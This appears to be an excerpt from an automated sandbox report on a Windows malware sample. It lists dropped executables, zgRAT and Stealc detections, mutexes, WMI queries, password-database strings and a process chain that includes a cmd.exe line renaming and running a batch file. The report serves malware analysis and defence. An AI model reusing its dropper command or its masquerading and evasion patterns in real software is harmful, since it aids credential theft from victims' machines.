Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_1_0027DDF9	9_1_0027DDF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02A9DC74	12_2_02A9DC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_05166948	12_2_05166948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_05167C20	12_2_05167C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_05160006	12_2_05160006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_05160040	12_2_05160040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_05167C10	12_2_05167C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_065BA6B8	12_2_065BA6B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_065B67D8	12_2_065B67D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_065BA688	12_2_065BA688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_065B6FF8	12_2_065B6FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_065B6FE8	12_2_065B6FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_06877650	12_2_06877650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_06878799	12_2_06878799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_068792D1	12_2_068792D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0687A260	12_2_0687A260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_068713C0	12_2_068713C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0687AC28	12_2_0687AC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_06876D80	12_2_06876D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_06879DE8	12_2_06879DE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_068713B0	12_2_068713B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_06876A38	12_2_06876A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089DB818	12_2_089DB818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D1018	12_2_089D1018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D8030	12_2_089D8030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D8021	12_2_089D8021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D09B0	12_2_089D09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D01D8	12_2_089D01D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D29D0	12_2_089D29D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D09C0	12_2_089D09C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D01E8	12_2_089D01E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D3128	12_2_089D3128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D4AD8	12_2_089D4AD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D4AC8	12_2_089D4AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D1B90	12_2_089D1B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D5350	12_2_089D5350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D5341	12_2_089D5341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D1498	12_2_089D1498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D1488	12_2_089D1488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D74C8	12_2_089D74C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D3D78	12_2_089D3D78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D6E88	12_2_089D6E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D9638	12_2_089D9638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D6E78	12_2_089D6E78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D5F59	12_2_089D5F59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_089D5F68	12_2_089D5F68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00402320	16_2_00402320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004050C0	16_2_004050C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00420470	16_2_00420470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040FCF0	16_2_0040FCF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00419D19	16_2_00419D19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0041951B	16_2_0041951B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00415635	16_2_00415635
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0041DEC3	16_2_0041DEC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00404F00	16_2_00404F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040CF8F	16_2_0040CF8F
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001C7600	17_2_001C7600
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_00181000	17_2_00181000
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001CB020	17_2_001CB020
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001C004B	17_2_001C004B
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001B40F5	17_2_001B40F5
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001C50E0	17_2_001C50E0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001891F0	17_2_001891F0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001812A7	17_2_001812A7
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001CB300	17_2_001CB300
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001AA345	17_2_001AA345
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001AC390	17_2_001AC390
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001C9390	17_2_001C9390
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_0018A3C0	17_2_0018A3C0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_00185400	17_2_00185400
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_00191420	17_2_00191420
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_00187470	17_2_00187470
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_0018B470	17_2_0018B470
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_0018E470	17_2_0018E470
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_00190480	17_2_00190480
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_0019E52C	17_2_0019E52C
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001AD56C	17_2_001AD56C
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001AD58E	17_2_001AD58E
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001B7620	17_2_001B7620
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_00189737	17_2_00189737
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_00183790	17_2_00183790
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001B27B0	17_2_001B27B0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_00188810	17_2_00188810
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001AC891	17_2_001AC891
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_0018A910	17_2_0018A910
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001C9970	17_2_001C9970
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_00189A02	17_2_00189A02
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001C5AD0	17_2_001C5AD0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001A7B0F	17_2_001A7B0F
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001ABB00	17_2_001ABB00
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001C9B60	17_2_001C9B60
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001B8C00	17_2_001B8C00
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001BFD0E	17_2_001BFD0E
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_00187E70	17_2_00187E70
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001C9E60	17_2_001C9E60
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_0018FEBC	17_2_0018FEBC
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001C7EDE	17_2_001C7EDE
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001ADEF8	17_2_001ADEF8
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001BEF50	17_2_001BEF50
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_0018BF80	17_2_0018BF80
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001C8F80	17_2_001C8F80
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_0018AFD0	17_2_0018AFD0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 17_2_001ADFE0	17_2_001ADFE0

Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: String function: 0018CAD0 appears 53 times
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: String function: 0018ED80 appears 194 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00407D30 appears 55 times

Source: 2[1].exe.9.dr	Static PE information: Number of sections : 18 > 10
Source: 2.exe.9.dr	Static PE information: Number of sections : 18 > 10

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 24.0.penis.exe.f40000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: crypted[1].exe.9.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypted.exe.9.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9974455040871935
Source: file.exe	Static PE information: Section: ifufhtja ZLIB complexity 0.9943735132322331
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9974455040871935
Source: axplong.exe.0.dr	Static PE information: Section: ifufhtja ZLIB complexity 0.9943735132322331

Source: axplong.exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@84/118@0/14

Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe

Code function: 17_2_001B81AA CoCreateInstance,

17_2_001B81AA

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\gold[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: Yara match	File source: 29.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.2232110837.0000000000401000.00000020.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat

Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: stealc_default2.exe, 00000015.00000002.2362375006.000000001B015000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2384811322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2386540936.000000006A6BF000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2909526627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2943418582.000000006939F000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2758067791.000000001B028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: stealc_default2.exe, 00000015.00000002.2362375006.000000001B015000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2384811322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2386540936.000000006A6BF000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2909526627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2943418582.000000006939F000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2758067791.000000001B028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: stealc_default2.exe, 00000015.00000002.2362375006.000000001B015000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2384811322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2386540936.000000006A6BF000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2909526627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2943418582.000000006939F000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2758067791.000000001B028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: stealc_default2.exe, 00000015.00000002.2362375006.000000001B015000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2384811322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2386540936.000000006A6BF000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2909526627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2943418582.000000006939F000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2758067791.000000001B028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: stealc_default2.exe, 00000015.00000002.2362375006.000000001B015000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2384811322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2386540936.000000006A6BF000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2909526627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2943418582.000000006939F000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2758067791.000000001B028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: stealc_default2.exe, 00000015.00000002.2362375006.000000001B015000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2384811322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2909526627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2758067791.000000001B028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: stealc_default2.exe, 00000015.00000002.2362375006.000000001B015000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2384811322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2386540936.000000006A6BF000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2909526627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2943418582.000000006939F000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2758067791.000000001B028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: stealc_default2.exe, 00000015.00000003.2165803392.0000000000910000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000003.2171184280.00000000210D9000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000003.2185946755.00000000210CA000.00000004.00000020.00020000.00000000.sdmp, JavvvUmar.exe, 0000001C.00000003.2401547311.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2403186118.0000000021106000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2384366257.00000000210E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: stealc_default2.exe, 00000015.00000002.2362375006.000000001B015000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2384811322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2909526627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2758067791.000000001B028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: stealc_default2.exe, 00000015.00000002.2362375006.000000001B015000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2384811322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2909526627.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2758067791.000000001B028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

ReversingLabs: Detection: 55%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
